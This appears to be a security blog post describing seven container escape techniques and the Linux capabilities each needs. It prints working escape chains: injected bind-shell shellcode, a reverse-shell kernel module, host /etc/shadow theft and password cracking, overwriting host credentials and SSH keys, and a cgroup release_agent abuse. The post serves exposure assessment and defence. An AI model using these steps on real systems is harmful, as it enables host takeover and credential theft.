Containers have become the go-to solution for application deployment, and their security has become a critical concern. In many scenarios, containers are now the primary attack surface. In this post, we delve into container escapes and explore seven common techniques for breaching container boundaries. For each technique, we describe the specific configuration that makes a container vulnerable and outline the minimal capabilities required inside the container to execute the escape. With this knowledge, you can evaluate whether a given container is exposed to an escape, assess the security posture of your containers, and select the most effective protective measures.
In this post we will assume some basic understanding of Linux and Docker. If you are not familiar with Linux capabilities and containers, you can read this 3-part post by Datadog that explains important concepts.
The container escape techniques described in this post are already known. This post highlights the minimal required Linux capabilities within the container and its setup to execute the escape.
The table below shows what the minimal required Linux capabilities are in each escape technique.
ID | Technique Name | Minimal Linux Capabilities |
1 | Mount the host filesystem | SYS_ADMIN |
2 | Use a mounted docker socket | No capability is required |
3 | Process Injection | SYS_PTRACE |
4 | Adding a malicious kernel module | SYS_MODULE |
5 | Reading secrets from the host | DAC_READ_SEARCH |
6 | Overriding files on host | DAC_READ_SEARCH, DAC_OVERRIDE |
7 | Abusing notify on release | SYS_ADMIN, DAC_OVERRIDE |
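Before we delve into the different escape techniques, we would like to highlight a few important notes:
* In escape techniques 6 and 7, the DAC_OVERRIDE capability is required for the escape commands.
* Each technique lists two commands for setting up the vulnerable container. The first grants only the minimal capabilities. The second also adds the capabilities below, which are typically needed to install the prerequisite packages inside the container:
--cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --cap-add=<CAPABILITY>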
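To evaluate a running container against the table above, one option is to decode the effective capability mask that the kernel reports in /proc/self/status. The sketch below is only an illustration and is not part of the original techniques: the helper names has_cap and list_escape_caps are hypothetical, and the bit numbers are the ones defined in linux/capability.h.

```shell
#!/bin/sh
# has_cap MASK BIT: succeed if bit number BIT is set in the hex capability mask MASK.
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# list_escape_caps MASK: print the capabilities from the table that are set in MASK.
# (Hypothetical helper; name:bit pairs follow linux/capability.h.)
list_escape_caps() {
    mask=$1
    for pair in DAC_OVERRIDE:1 DAC_READ_SEARCH:2 SYS_MODULE:16 SYS_PTRACE:19 SYS_ADMIN:21; do
        name=${pair%%:*}
        bit=${pair##*:}
        if has_cap "$mask" "$bit"; then
            echo "$name"
        fi
    done
}

# Read the effective capability set of the current process, if /proc is available.
if [ -r /proc/self/status ]; then
    cap_eff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    if [ -n "$cap_eff" ]; then
        list_escape_caps "$cap_eff"
    fi
fi
```

Run as root inside a container started with --cap-drop=ALL --cap-add=SYS_ADMIN, this should print only SYS_ADMIN. An empty output means none of the capabilities from the table are in the effective set.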
1. Mount the host filesystem
Escape description
This technique enables escape from a container by mounting the host filesystem.
Vulnerable container requirements
Commands to set up a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash
Note: AppArmor blocks the ‘mount’ operation even if the SYS_ADMIN capability is assigned to the container process. We therefore disable AppArmor when creating the vulnerable container.
TIP: You can see which AppArmor profile, if any, applies to the container’s process by inspecting the ‘/proc/$$/attr/current’ file.
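The check from the tip can be wrapped in a small script. This is a sketch under the assumption that the file holds either the word unconfined or a profile name followed by its mode in parentheses, such as docker-default (enforce). The helper name apparmor_state is hypothetical, and on hosts that use a different security module the label will fall into the unknown branch.

```shell
#!/bin/sh
# apparmor_state LABEL: classify a label read from /proc/<pid>/attr/current.
# (Hypothetical helper; assumes AppArmor's "profile (mode)" label format.)
apparmor_state() {
    case "$1" in
        "")            echo "none" ;;        # nothing readable, AppArmor may be disabled
        unconfined)    echo "unconfined" ;;
        *"(enforce)")  echo "enforced" ;;
        *"(complain)") echo "complain" ;;
        *)             echo "unknown" ;;
    esac
}

# Read the label of the current shell; tolerate a missing or unreadable file.
label=$(cat "/proc/$$/attr/current" 2>/dev/null || true)
echo "AppArmor state: $(apparmor_state "$label")"
```

A result of enforced suggests that a profile is confining the container process, which is the situation the note above describes for ‘mount’.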
Commands to escape the container
mount /dev/<DEVICE-FILE> /mnt
ls /mnt
2. Use a mounted Docker socket
Escape description
The Docker daemon is the process that manages containers on the host, and it listens for Docker API requests on the Docker socket. If the Docker socket is mounted into a container, processes inside that container can communicate with the Docker daemon.
Vulnerable container requirements
# docker install: https://docs.docker.com/engine/install/ubuntu/
Commands to set up a vulnerable container
docker run -it --cap-drop=ALL -v /var/run/docker.sock:/run/docker.sock ubuntu bash
docker run -it --cap-drop=ALL --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v /var/run/docker.sock:/run/docker.sock ubuntu bash
Commands to escape the container
Create a privileged container with the host filesystem mounted inside it.
docker run -it --privileged -v /:/host/ ubuntu bash -c "chroot /host/"
In the command above, we create a new privileged container that mounts the host filesystem and use it to escape from the first container to the host.
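To check whether a container is exposed to this technique, it is enough to look for a Unix socket at the usual Docker socket locations. The sketch below is a minimal illustration: the function name find_docker_socket is hypothetical, and the two paths are the ones that appear in the setup commands of this section, so a socket mounted elsewhere would not be found.

```shell
#!/bin/sh
# find_docker_socket PATH...: print the first path that is a Unix socket.
# Returns non-zero when none of the given paths is a socket.
# (Hypothetical helper for auditing a container from the inside.)
find_docker_socket() {
    for path in "$@"; do
        if [ -S "$path" ]; then
            echo "$path"
            return 0
        fi
    done
    return 1
}

# Candidate locations taken from the setup commands in this section.
find_docker_socket /var/run/docker.sock /run/docker.sock \
    || echo "no Docker socket found at the checked paths"
```

Any path printed by this check means that processes in the container can reach the Docker daemon, regardless of which Linux capabilities the container holds.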
3. Process injection
Escape description
Process injection allows one process to write into the memory space of another process and execute shellcode there. To inject shellcode into a process on the host, the container must have two things:
The injection can fail and lead to unwanted behavior in the target process. To avoid such a situation, in this escape technique we use a Python HTTP server running on the host as the target process and inject the shellcode into its memory.
Vulnerable container and host requirements
apt install vim # or any other editor
apt install gcc
apt install net-tools
apt install netcat
/usr/bin/python3 -m http.server 8080 &
Commands to set up a vulnerable container
docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --security-opt apparmor=unconfined ubuntu bash
docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined ubuntu bash
Note: AppArmor blocks the ‘ptrace’ operation even if the SYS_PTRACE capability is assigned to the container process. We therefore disable AppArmor when creating the vulnerable container.
Commands to escape the container
In this technique we use this infect.c code (by 0x00pf) to create an injector. We replaced the shellcode (lines 36-39) with the following shellcode, taken from https://www.exploit-db.com/exploits/41128, and changed ‘SHELLCODE_SIZE’ (line 33) to 87.
"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
Use the commands below to escape the container:
# Find the PID of the target process running on the host.
ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1
# Paste the injector source code into inject.c
vim inject.c
gcc -o inject inject.c
# Inject the shellcode payload, which opens a listener on port 5600
./inject <PID>
# Connect to the listener on port 5600
nc <HOST-IP> 5600
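The port 5600 used in the last two steps is embedded in the shellcode itself: the two bytes \x15\xe0 hold the listener port in network (big-endian) byte order. The short sketch below shows the arithmetic. The function name port_from_bytes is hypothetical and is not part of the injector code.

```shell
#!/bin/sh
# port_from_bytes HI LO: combine two hex bytes in network byte order
# into a decimal TCP port number. (Hypothetical helper for illustration.)
port_from_bytes() {
    echo $(( (0x$1 << 8) | 0x$2 ))
}

# The bytes \x15\xe0 from the shellcode above:
port_from_bytes 15 e0   # prints 5600
```

This is why the final step connects with nc to port 5600 on the host.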
4. Adding a malicious kernel module
Escape description
Linux containers share the host's operating system kernel, while their processes are isolated from the rest of the system. A container that has the SYS_MODULE capability can load kernel modules into the shared kernel and unload them from it. In this container escape technique, we create a module in the container that opens a reverse shell from the host, and then use the SYS_MODULE capability to load it into the kernel.
Vulnerable container requirements
apt install make
apt install -y vim # or any other editor
apt install -y netcat
apt install -y gcc
# Container should run with the same operating system version as the host.
# Get the kernel version by ‘uname -r’
version=$(uname -r)
apt install -y linux-headers-$version
apt install -y kmod
apt install net-tools
Commands to set up a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_MODULE ubuntu:<HOST-OS-VERSION> bash
docker run -it --cap-drop=ALL --cap-add=SYS_MODULE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE ubuntu:<HOST-OS-VERSION> bash
Commands to escape the container
In this technique we use this reverse-shell.c code to create the malicious kernel module. We will change the IP in the reverse shell to the IP of the container. We also use the Makefile from there.
# Get the IP address of the container
ifconfig
# Copy reverse-shell.c and update the IP address in the code to the IP of the container
vim reverse-shell.c
# Copy the Makefile
vim Makefile
make
nc -lnvp 4444 &
# Load the module into the host’s kernel
insmod reverse-shell.ko
fg %<JOB-ID>
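As a defensive counterpart to this technique, the kernel exposes the kernel.modules_disabled sysctl. When it is set to 1, modules can be neither loaded nor unloaded until the next reboot. The sketch below reads the setting through /proc/sys/kernel/modules_disabled. The helper name modules_state is hypothetical, and the file may be missing or unreadable in some environments, in which case the result is unknown.

```shell
#!/bin/sh
# modules_state VALUE: interpret the content of /proc/sys/kernel/modules_disabled.
# (Hypothetical helper; 1 means module loading is locked until reboot.)
modules_state() {
    case "$1" in
        1) echo "disabled" ;;
        0) echo "enabled" ;;
        *) echo "unknown" ;;
    esac
}

# Report whether the shared kernel currently accepts new modules.
echo "Kernel module loading: $(modules_state "$(cat /proc/sys/kernel/modules_disabled 2>/dev/null)")"
```

A result of enabled means that a container holding SYS_MODULE can still load modules into the shared kernel.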
5. Reading secrets from the host
Escape description
The DAC_READ_SEARCH capability allows a process to bypass file and directory read permission checks and to use the ‘open_by_handle_at’ system call, which makes it possible to traverse the host’s entire filesystem. In this container escape technique, we execute code that uses ‘open_by_handle_at’ to read the /etc/passwd and /etc/shadow files from the host and save their contents in the container. Next, we use the ‘John the Ripper’ password cracker to recover the host users’ passwords, which can then be used to connect to the host over SSH.
Vulnerable container and host requirements
apt install -y vim # or any other editor
apt install -y ssh
apt install -y gcc
apt install john -y # John the Ripper password cracker package
apt install net-tools
apt install -y netcat
sudo apt install openssh-server
Commands to set up a vulnerable container
sudo docker run -it --cap-drop=ALL --cap-add=DAC_READ_SEARCH ubuntu bash
sudo docker run -it --cap-drop=ALL --cap-add=DAC_READ_SEARCH --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE ubuntu bash
Commands to escape the container
In this technique we use the shocker.c exploit to read the files from the host.
# Copy the shocker.c content
vim shocker.c
gcc -o shocker shocker.c
# Use shocker to read files from the host: ./shocker /host/path /container/path
./shocker /etc/passwd passwd
./shocker /etc/shadow shadow
# Combine passwd and shadow files
unshadow passwd shadow > password
# Use John the Ripper to crack passwords
john password
# Connect to the host with the credentials from John the Ripper’s output
ssh <USER-NAME>@<HOST-IP>
password: <password from john’s output>
6. Overriding files on host
Escape description
The DAC_OVERRIDE capability allows a process to bypass read, write, and execute permission checks. A container that runs with the DAC_READ_SEARCH and DAC_OVERRIDE capabilities can read and write files on the host filesystem. In this escape, we use these capabilities to update a user’s credential files on the host and later log in to the host with the updated credentials.
In this container escape technique, we present two options: overriding a user’s password, and overriding a user’s authorized keys.
Vulnerable container and host requirements
apt install -y vim # or any other editor
apt install -y ssh
apt install -y gcc
sudo apt install openssh-server
Commands to set up a vulnerable container
Option 1 - override user’s password:
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=CHOWN ubuntu bash
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=CHOWN --cap-add=SETGID --cap-add=SETUID --cap-add=FOWNER ubuntu bash
Note: The CHOWN capability is needed to create a new user.
Option 2 – override user’s authorized keys:
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH ubuntu bash
docker run -it --cap-drop=ALL --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER ubuntu bash
Commands to escape the container
In this technique we use the shocker.c exploit code from the previous escape technique and the shocker_write.c to write files to the host.
Option 1 - override user’s password:
# Copy and paste the shocker.c content
vim shocker.c
gcc -o read shocker.c
# Copy and paste the shocker_write.c content
vim shocker_write.c
gcc -o write shocker_write.c
# Use the ./read to read files from host: ./read /host/path /container/path
./read /etc/shadow shadow
./read /etc/passwd passwd
# Create new user and reset its password
useradd <USER-NAME>
echo '<USER-NAME>:<PASSWORD>' | chpasswd
# Update the new user details in the copied files from host
tail -1 /etc/passwd >> passwd
tail -1 /etc/shadow >> shadow
# Copy the new user’s password hash and paste it as the root user’s hash in the shadow file. This will allow us to elevate permissions on the host.
vim shadow
# Use ./write to write files to the host: ./write /host/path /container/path
./write /etc/passwd passwd
./write /etc/shadow shadow
# Connect to host over ssh using the new user (unprivileged)
ssh <USER>@<HOST-IP>
# Elevate privileges to root user with the new password
su
Note: we chose to escape using the new unprivileged user and later elevate the permissions to root on the host, to include cases where the “PermitRootLogin” option is set to “no” in the sshd_config file.
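Whether the detour through an unprivileged user is needed depends on the host’s “PermitRootLogin” setting. The sketch below prints the first value set in an sshd_config file. It is a simplified illustration: the function name permit_root_login is hypothetical, and it ignores Include directives and Match blocks, so a tool such as sshd’s own configuration dump is more reliable when available.

```shell
#!/bin/sh
# permit_root_login FILE: print the first PermitRootLogin value set in FILE,
# or "unset" if the keyword does not appear. Commented-out lines are skipped
# because their first field starts with '#'. (Hypothetical helper.)
permit_root_login() {
    awk 'tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
         END { if (!found) print "unset" }' "$1"
}

# Check the default configuration path when it is readable.
if [ -r /etc/ssh/sshd_config ]; then
    echo "PermitRootLogin: $(permit_root_login /etc/ssh/sshd_config)"
fi
```

A value of no corresponds to the case described in the note, where logging in as an unprivileged user and then running su is required.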
Option 2 – override user’s authorized keys:
# Generate new ssh key
ssh-keygen
# Copy and paste the shocker.c content
vim shocker.c
gcc -o read shocker.c
# Copy and paste the shocker_write.c content
vim shocker_write.c
gcc -o write shocker_write.c
# Use the ./read to read files from host: ./read /host/path /container/path
./read ~/.ssh/authorized_keys authorized_keys
# Copy the new ssh public key
# Remove the 'authorized_keys' content and paste the public key
vim authorized_keys
# Use ./write to write files to the host: ./write /host/path /container/path
./write ~/.ssh/authorized_keys authorized_keys
# Connect to host over ssh
ssh -i <PRIVATE-KEY> <USER>@<HOST-IP>
7. Abusing notify on release
Escape description
Cgroups (control groups) are a Linux kernel feature for resource allocation and management. They are exposed through virtual filesystems whose files describe the cgroups and their limits. Cgroups version 1 includes the ‘notify_on_release’ file, which can contain 1 or 0. If ‘notify_on_release’ is enabled (contains 1), then when the last task in the cgroup leaves, the kernel executes the command specified in the ‘release_agent’ file. In the next technique, inspired by Felix Wilhelm, we use this functionality to execute arbitrary commands on the host.
Vulnerable container and host requirements
TIP: You can check the cgroups version of the container’s host by executing the following command:
mount | grep '^cgroup' | awk '{print $5}' | uniq
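An alternative check, sketched below, looks at the filesystem type mounted at /sys/fs/cgroup: GNU stat reports cgroup2fs when the unified cgroups version 2 hierarchy is mounted there, and tmpfs on a version 1 layout. The helper name cgroup_version is hypothetical, and other setups, including containers where the path is not mounted, fall into the unknown branch.

```shell
#!/bin/sh
# cgroup_version FSTYPE: map the filesystem type of /sys/fs/cgroup to a
# cgroups version. (Hypothetical helper; hybrid setups also report tmpfs.)
cgroup_version() {
    case "$1" in
        cgroup2fs) echo "v2" ;;
        tmpfs)     echo "v1" ;;
        *)         echo "unknown" ;;
    esac
}

# stat -f reports on the filesystem; %T prints its type in human-readable form.
echo "cgroups: $(cgroup_version "$(stat -fc %T /sys/fs/cgroup 2>/dev/null)")"
```

Since ‘notify_on_release’ and ‘release_agent’ belong to cgroups version 1, a result of v2 suggests that this technique does not apply as described.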
Commands to set up a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined ubuntu:16.04 bash
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=DAC_OVERRIDE --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --security-opt apparmor=unconfined ubuntu:16.04 bash
Note: AppArmor blocks the ‘mount’ operation even if the SYS_ADMIN capability is assigned to the container process. We therefore disable AppArmor when creating the vulnerable container.
TIP: You can see which AppArmor profile, if any, applies to the container’s process by inspecting the ‘/proc/$$/attr/current’ file.
Commands to escape the container
# Create /tmp/cgrp, mount the RDMA cgroup controller into it, and create a child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Enable the notify_on_release flag
echo 1 > /tmp/cgrp/x/notify_on_release
# Set host_path to the path of the container’s filesystem on the host
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Set release_agent to the path of the command that is executed when all tasks in a cgroup are done.
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
Container escapes continue to pose a significant threat to container security. As containers have become the preferred choice for application deployment, it is crucial to stay informed about the techniques used to breach container boundaries.
In this post, we covered seven common container escape techniques, along with the container configuration and minimal Linux capabilities that each one requires. This knowledge helps container operators assess how exposed their containers are and choose the most effective protective measures. Container escapes can give attackers unauthorized access and compromise the integrity of applications and systems. By understanding and addressing these risks, we can fortify our container environments and keep our applications secure and reliable.